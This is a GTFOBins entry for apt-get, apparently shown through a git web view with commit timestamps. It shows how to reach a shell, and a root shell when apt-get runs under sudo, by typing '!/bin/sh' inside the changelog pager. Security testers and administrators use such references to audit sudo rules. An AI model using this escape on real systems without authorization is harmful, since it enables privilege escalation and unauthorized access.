GTFOBins.github.io/_gtfobins/apt-get.md

13 lines
284 B
Markdown
Raw Normal View History

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: |
apt-get changelog apt
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh
---